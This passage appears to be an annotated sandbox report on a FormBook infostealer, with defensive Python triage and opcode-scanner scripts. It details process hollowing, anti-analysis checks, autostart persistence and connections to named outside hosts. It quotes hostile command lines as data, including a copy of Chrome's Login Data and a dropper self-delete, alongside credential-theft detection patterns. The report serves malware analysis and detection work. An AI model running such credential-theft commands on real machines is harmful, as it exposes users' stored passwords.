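    (13, 0, r"C:\Windows\SysWOW64\cmmon32.exe", r"C:\Windows\SysWOW64\cmmon32.exe"),
]

# Windows binaries this run shows started with no arguments and used as hosts for injected code.
INJECTION_HOSTS = {"cmstp.exe", "cmmon32.exe"}
# Browser credential stores (lower-case path suffixes). Chrome's Login Data is what the
# report shows; logins.json (Firefox) and Web Data (Chrome) are added as a generalisation.
BROWSER_CRED_FILES = (r"\login data", r"\logins.json", r"\web data")

TOKEN = re.compile(r"'[^']*'|\"[^\"]*\"|\S+")


def tokens(cmdline):
    """Split a command line the way the report renders it; quoted spans stay whole."""
    return [t.strip("'\"") for t in TOKEN.findall(cmdline)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def arguments(name, cmdline):
    """Arguments without the program token (which is absent for the cmd.exe children here)."""
    toks = tokens(cmdline)
    if toks and basename(toks[0]) == name:
        toks = toks[1:]
    return toks


def triage(events):
    """Return (pid, rule, detail) findings for the four behaviours seen in this run."""
    image_of = {pid: image for pid, _, image, _ in events}
    executed = {image.lower() for image in image_of.values()}
    findings = []
    for pid, ppid, image, cmdline in events:
        name = basename(image)
        args = arguments(name, cmdline)
        if name in INJECTION_HOSTS and not args:
            findings.append((pid, "bare_injection_host", name))
        if ppid in image_of and image_of[ppid].lower() == image.lower():
            findings.append((pid, "self_spawn", name))
        if name == "cmd.exe":
            low = [a.lower() for a in args]
            if "del" in low:
                for target in low:
                    if target in executed:
                        findings.append((pid, "deletes_executed_binary", target))
            if "copy" in low:
                for src in low:
                    if src.endswith(BROWSER_CRED_FILES):
                        findings.append((pid, "browser_credential_store_copy", src))
    return findings


def render_tree(events):
    """Indented parent/child view, one line per event."""
    children = defaultdict(list)
    for pid, ppid, image, cmdline in events:
        children[ppid].append((pid, image, cmdline))
    lines = []

    def walk(parent, depth):
        for pid, image, cmdline in children.get(parent, []):
            lines.append("  " * depth + f"[{pid}] {basename(image)}  {cmdline}")
            walk(pid, depth + 1)

    walk(0, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_tree(EVENTS))
    for pid, rule, detail in triage(EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
```

Against real telemetry the `self_spawn` rule needs the parent's image from the event stream rather than from the same batch, and `deletes_executed_binary` should look back over a window of earlier process starts; both are deliberately kept batch-local here so the script runs on the transcribed events alone.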
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
Writes ini files
Source: C:\Windows\SysWOW64\cmstp.exe | File written: C:\Users\user\AppData\Roaming\23OP2RPA\23Ologri.ini
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Windows\SysWOW64\cmstp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Note: the key opened is the Outlook profile store (mail account settings), not an Office version marker; together with the Firefox install-path lookup above this is the mail and browser credential discovery counted as Email Collection in the matrix.
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: cmmon32.pdb | source: zx4pbev1pyv_h.exe
Source: Binary string: wntdll.pdb | source: SWIFTCOPY.exe
Source: Binary string: cmstp.pdb | source: SWIFTCOPY.exe
Note: none of these is the sample's own PDB path. They are the symbol names of Windows images (cmstp.exe, cmmon32.exe and the 32-bit ntdll.dll) found in each dropper's memory, which fits each instance having mapped the system binary it later ran its code in (SWIFTCOPY.exe with cmstp.exe, zx4pbev1pyv_h.exe with cmmon32.exe).

Data Obfuscation:

Binary may include packed or encrypted code
Source: initial sample | Static PE information: section name: .text entropy: 7.88071807995 (reported twice)
Note: 7.88 bits per byte out of a possible 8 means the code section is compressed or encrypted rather than plain x86 code. This matches the "packed code" hit under System Summary and the VB6 runtime loads: the visible VB6 executable is consistent with a loader that unpacks the real payload in memory.

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\G7nl84b3\zx4pbev1pyv_h.exe
Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe
Note: the 7za.exe drop is the sandbox helper unpacking the downloaded archive. The explorer.exe drop is the sample's doing: explorer.exe has no business writing executables into a random-named Temp subdirectory, and the same file name is what explorer.exe then launches from C:\Program Files (x86)\G7nl84b3\ (see Spawns processes).

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\SysWOW64\cmstp.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value name VHSDVLYPND (reported twice; the value data, i.e. the path that is autostarted, is not shown in this report)

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX (15 times)
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 times)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (3 times)
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe | Process information set: NOOPENFILEERRORBOX
Note: cmd.exe and the .NET-based sandbox helper set these flags routinely; only the SWIFTCOPY.exe, zx4pbev1pyv_h.exe and cmstp.exe lines relate to the sample, and even those are weak evidence on their own.

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SWIFTCOPY.exe | Binary or memory string: SBIEDLL.DLL
Source: SWIFTCOPY.exe.4.dr | Binary or memory string (one upper-cased run of module and API names as stored in the binary, split here for readability; truncated in the report): LOADLIBRARYW NTPROTECTVIRTUALMEMORY NTQUERYINFORMATIONPROCESS NTALLOCATEVIRTUALMEMORY GETPROCADDRESS KERNEL32.DLL SBIEDLL.DLL DBGHELP.DLL NTDLL.DLL NTDLL NTSETINFORMATIONTHREAD NTWRITEVIRTUALMEMORY RTLADJUSTPRIVILEGE NTSETINFORMATIONPROCESS RTLDECOMPRESSBUFFER NTQUERYINFORMATIONPROCESS KERNEL32 EXITPROCESS VIRTUALPROTECT VIRTUALALLOC SLEEP CREATEFILEW WRITEFILE CLOSEHANDLE GETMODULEHANDLEW GETENVIRONMENTVARIABLEW GETTICKCOUNT ADVAPI32 REGOPENKEYEXW REGQUERYVALUEEXW REGCLOSEKEY CRYPTACQUIRECONTEXTW CRYPTCREATEHASH CRYPTHASHDATA CRYPTDERIVEKEY CRYPTDECRYPT CRYPTENCRYPT CRYPTDESTROYKEY CRYPTDESTROYHASH CRYPTRELEASECONTEXT USER32 CALLWINDOWPROCW OLE32 COTASKMEMALLOC SHELL32 SHELLEXECUTEW OLEAUT32 SYSALLOCSTRINGBYTELEN U
Note: SBIEDLL.DLL is the Sandboxie injected DLL, checked for by module name. The surrounding list is the API set the unpacking stub resolves by name: NtAllocateVirtualMemory / NtProtectVirtualMemory / NtWriteVirtualMemory for writing and executing the decoded payload, RtlDecompressBuffer and the Crypt* family for decompressing and decrypting it, NtSetInformationThread (typically ThreadHideFromDebugger) and NtQueryInformationProcess for the anti-debug checks below. It fits the high .text entropy and the "packed code" hits.
Tries to detect virtualization through RDTSC time measurements
All eight hits are the same four-instruction sequence (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc) at two sites per process; first/second address of each pair:
  C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe | 0x0000000000407244 / 0x000000000040724A | 0x00000000004074AE / 0x00000000004074B4
  C:\Windows\SysWOW64\cmstp.exe | 0x0000000000437244 / 0x000000000043724A | 0x00000000004374AE / 0x00000000004374B4
  C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe | 0x0000000000407244 / 0x000000000040724A | 0x00000000004074AE / 0x00000000004074B4
  C:\Windows\SysWOW64\cmmon32.exe | 0x00000000008C7244 / 0x00000000008C724A | 0x00000000008C74AE / 0x00000000008C74B4
Note: the sequence keeps the low 32 bits of the first time stamp in ecx and reads the counter again; the code that follows (not shown in the report) compares the difference against a threshold, which a sandbox that intercepts rdtsc, as this one did, inflates. The low 16 bits of every address are the same (0x7244 and 0x74AE), so all four processes are executing the same code image at the same RVAs, simply mapped at different bases: the same injected payload in each of them.
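As an added example (not part of the report), the Python scanner below looks for the exact opcode sequence listed above, covering both common encodings of xor ecx,ecx and add ecx,eax, and then applies the low-16-bit comparison from the note to the four first-hit addresses. The image it scans is constructed: NOP filler with the sequence planted at RVAs 0x7244 and 0x74AE as in the report. The report gives no image bases, so the 0x400000 base used in the usage is an assumption.

```python
import re

# 32-bit encodings of the four-instruction sequence the report lists at each hit:
#   rdtsc          0F 31
#   xor ecx, ecx   31 C9  or  33 C9
#   add ecx, eax   01 C1  or  03 C8
#   rdtsc          0F 31
RDTSC_PAIR = re.compile(rb"\x0f\x31(?:\x31\xc9|\x33\xc9)(?:\x01\xc1|\x03\xc8)\x0f\x31")

# First-hit addresses from the report, per process.
REPORT_HITS = {
    "SWIFTCOPY.exe": 0x407244,
    "cmstp.exe": 0x437244,
    "zx4pbev1pyv_h.exe": 0x407244,
    "cmmon32.exe": 0x8C7244,
}


def find_rdtsc_pairs(buf, base=0):
    """Return the virtual addresses of every back-to-back rdtsc pair in buf."""
    return [base + m.start() for m in RDTSC_PAIR.finditer(buf)]


def same_code_image(addresses):
    """True if all addresses share their low 16 bits. Windows maps images at
    64 KiB allocation granularity, so equal low 16 bits across processes means
    the same RVA in the same image, mapped at different bases."""
    return len({a & 0xFFFF for a in addresses}) == 1


def build_sample_image(size=0x8000):
    """Constructed image: NOP filler with the sequence at the two RVAs the report
    shows (0x7244 and 0x74AE), using the 33 C9 / 03 C8 encodings."""
    buf = bytearray(b"\x90" * size)
    seq = b"\x0f\x31\x33\xc9\x03\xc8\x0f\x31"
    for rva in (0x7244, 0x74AE):
        buf[rva:rva + len(seq)] = seq
    return bytes(buf)


if __name__ == "__main__":
    image = build_sample_image()
    for addr in find_rdtsc_pairs(image, base=0x400000):   # assumed base
        print(f"rdtsc pair at 0x{addr:08X} (RVA 0x{addr & 0xFFFF:04X})")
    print("same code in all four processes:", same_code_image(REPORT_HITS.values()))
```

The scanner is a static check and will also fire on benign timing code that uses the same idiom; what makes it useful here is the second step, which turns a handful of per-process hits into the statement that one injected image is running in four processes.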
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\unarchiver.exe | Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 4600 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 4860 | Thread sleep time: -74000s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe TID: 4620 | Thread sleep time: -75000s >= -30000s
Note: the unarchiver.exe delay of 922337203685477 is the sandbox helper waiting indefinitely for its child (Int64.MaxValue in 100 ns ticks expressed in milliseconds) and is not sample behaviour. The explorer.exe and cmstp.exe sleeps come from the injected code and are what the Timeout stop reason and the next signature refer to.
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe | Last function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: SWIFTCOPY.exe | Binary or memory string: *QEMU*
Source: cmstp.exe | Binary or memory string: "Hyper-V RAW"
Source: SWIFTCOPY.exe | Binary or memory string: *VMWARE*
Source: SWIFTCOPY.exe.4.dr | Binary or memory string: *QEMU*NSYSTEM\ControlSet001\Services\Disk\Enum
Note: *QEMU* and *VMWARE* next to SYSTEM\ControlSet001\Services\Disk\Enum are wildcard patterns matched against the disk device identifiers in that key, a standard hypervisor check. "Hyper-V RAW" is a string present in ordinary Windows process memory and is weak evidence on its own.
Queries a list of all running processes
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe | Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe -- Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmstp.exe -- Process queried: DebugPort
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe -- Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe -- Process queried: DebugPort
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe -- Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\SysWOW64\unarchiver.exe -- Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\explorer.exe -- File created: zx4pbev1pyv_h.exe.10.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe -- Network Connect: 103.197.25.46 80
Source: C:\Windows\explorer.exe -- Network Connect: 154.85.184.57 80
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe -- Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe -- Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe -- Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe -- Section loaded: unknown target: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe protection: execute and read and write
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe -- Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe -- Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe -- Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe -- Thread register set: target process: 2864
Source: C:\Windows\SysWOW64\cmstp.exe -- Thread register set: target process: 2864
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe -- Thread register set: target process: 2864
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe -- Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe -- Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 12A0000
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe -- Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: C00000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\unarchiver.exe -- Process created: C:\Windows\SysWOW64\7za.exe 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv' 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\O0N4T4W6\SWIFTCOPY.zip'
Source: C:\Windows\SysWOW64\unarchiver.exe -- Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'
Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe
Source: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe -- Process created: C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe
Source: C:\Windows\SysWOW64\cmstp.exe -- Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\ysx3qeyd.sxv\SWIFTCOPY.exe'
Source: C:\Windows\SysWOW64\cmstp.exe -- Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe -- Process created: C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe C:\Program Files (x86)\G7nl84b3\zx4pbev1pyv_h.exe
May try to detect the Windows Explorer process (often used for injection)
Source: explorer.exe -- Binary or memory string: Shell_TrayWnd
Source: explorer.exe -- Binary or memory string: Progman
Source: explorer.exe -- Binary or memory string: "Program Manager"

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe -- Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmstp.exe -- Queries volume information: C:\ VolumeInformation
Queries the cryptographic machine GUID
Source: C:\Windows\SysWOW64\unarchiver.exe -- Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmstp.exe -- File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles\0i8ia8vs.default\logins.json
Source: C:\Windows\SysWOW64\cmstp.exe -- File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles\0i8ia8vs.default\key4.db
Source: C:\Windows\SysWOW64\cmstp.exe -- File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\cmstp.exe -- File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles\0i8ia8vs.default\cert9.db
Source: C:\Windows\SysWOW64\cmstp.exe -- File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles\0i8ia8vs.default\pkcs11.txt
Source: C:\Windows\SysWOW64\cmstp.exe -- File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\cmstp.exe -- Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Malware Configuration

No configs have been found

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 225598
URL: https://onedrive.live.com/d...
Startdate: 27/04/2020
Architecture: WINDOWS
Score: 100

Process tree with signatures, dropped files and network nodes (node numbers are the graph's own IDs; "started", "injected" and "dropped" are the edge labels):

  • 2 (sample URL)
    • 98 Multi AV Scanner detection for dropped file
    • 100 Sigma detected: Steal Google chrome login data
    • 102 Machine Learning detection for dropped file
    • 104 2 other signatures
    • 13 iexplore.exe 7 57 (started)
      • 15 unarchiver.exe 5 (started)
        • 20 cmd.exe 1 (started)
          • 25 SWIFTCOPY.exe 13 (started)
            • 110 Multi AV Scanner detection for dropped file
            • 112 Machine Learning detection for dropped file
            • 114 Maps a DLL or memory area into another process
            • 116 Tries to detect virtualization through RDTSC time measurements
            • 32 SWIFTCOPY.exe (started)
              • 82 Modifies the context of a thread in another process (thread injection)
              • 84 Maps a DLL or memory area into another process
              • 86 Sample uses process hollowing technique
              • 88 Queues an APC in another process (thread injection)
              • 35 explorer.exe 6 (injected)
                • 76 www.dangchelan.com 103.197.25.46, 49951, 80 unknown Hong Kong
                • 78 www.dealspiper.com 154.85.184.57, 49952, 49953, 49954 unknown Seychelles
                • 80 2 other IPs or domains
                • 62 C:\Users\user\AppData\...\zx4pbev1pyv_h.exe, PE32 (dropped)
                • 106 System process connects to network (likely due to code injection or exploit)
                • 108 Benign windows process drops PE files
                • 40 cmstp.exe 1 19 (started)
                  • 66 C:\Users\user\AppData\...\23Ologrv.ini, data (dropped)
                  • 68 C:\Users\user\AppData\...\23Ologri.ini, data (dropped)
                  • 70 C:\Users\user\AppData\...\23Ologrf.ini, data (dropped)
                  • 118 Detected FormBook malware
                  • 120 Tries to steal Mail credentials (via file access)
                  • 122 Tries to harvest and steal browser information (history, passwords, etc)
                  • 124 Modifies the context of a thread in another process (thread injection)
                  • 48 cmd.exe 2 (started)
                    • 60 C:\Users\user\AppData\Local\Temp\DB1, SQLite (dropped)
                    • 90 Tries to harvest and steal browser information (history, passwords, etc)
                  • 52 cmd.exe 1 (started)
                • 44 zx4pbev1pyv_h.exe 4 (started)
                  • 126 Maps a DLL or memory area into another process
                  • 54 zx4pbev1pyv_h.exe (started)
                • 46 cmmon32.exe (started)
                  • 128 Tries to detect virtualization through RDTSC time measurements
          • 28 conhost.exe (started)
        • 22 7za.exe 2 (started)
          • 64 C:\Users\user\AppData\Local\...\SWIFTCOPY.exe, PE32 (dropped)
          • 30 conhost.exe (started)
      • 17 iexplore.exe 26 (started)
        • 72 onedrive.live.com
        • 74 gemihq.dm.files.1drv.com
56 conhost.exe